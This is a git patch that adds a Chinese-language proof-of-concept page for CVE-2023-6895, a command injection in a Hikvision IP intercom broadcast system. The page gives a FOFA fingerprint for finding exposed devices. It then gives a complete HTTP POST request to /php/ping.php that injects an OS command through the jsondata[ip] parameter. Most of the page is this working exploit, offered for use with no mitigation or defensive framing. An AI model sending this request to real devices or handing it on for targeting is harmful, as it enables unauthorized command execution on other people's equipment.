From e72500f1e73e46bf9c113114ce54ae9b656d318f Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 23 Dec 2023 18:22:05 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B5=B7=E5=BA=B7=E5=A8=81=E8=A7=86CV?=
 =?UTF-8?q?E-2023-6895=20IP=E7=BD=91=E7=BB=9C=E5=AF=B9=E8=AE=B2=E5=B9=BF?=
 =?UTF-8?q?=E6=92=AD=E7=B3=BB=E7=BB=9F=E8=BF=9C=E7=A8=8B=E5=91=BD=E4=BB=A4?=
 =?UTF-8?q?=E6=89=A7=E8=A1=8C.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...VE-2023-6895 IP网络对讲广播系统远程命令执行.md | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行.md

diff --git a/海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行.md b/海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行.md
new file mode 100644
index 0000000..85375c1
--- /dev/null
+++ b/海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行.md	
@@ -0,0 +1,27 @@
+## 海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行
+海康威视对讲广播系统3.0.3_20201113_RELEASE(HIK)存在漏洞。它已被宣布为关键。该漏洞影响文件/php/ping.php 的未知代码。使用输入 netstat -ano 操作参数 jsondata[ip] 会导致 os 命令注入。
+
+## fofa
+```
+icon_hash="-1830859634"
+```
+
+## poc
+```
+POST /php/ping.php HTTP/1.1
+Host: xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 45
+Origin: http://xxx.xxx.xxx
+Connection: close
+Referer: http://xxx.xxx.xxx/html/system.html
+X-Forwarded-For: 127.0.0.1
+
+jsondata[type]=3&jsondata[ip]=ipconfig
+```
+![0a7e02e1600a63bf856d6581f918b036](https://github.com/wy876/POC/assets/139549762/7f52597a-bcb4-402e-89fe-c0682cb61d40)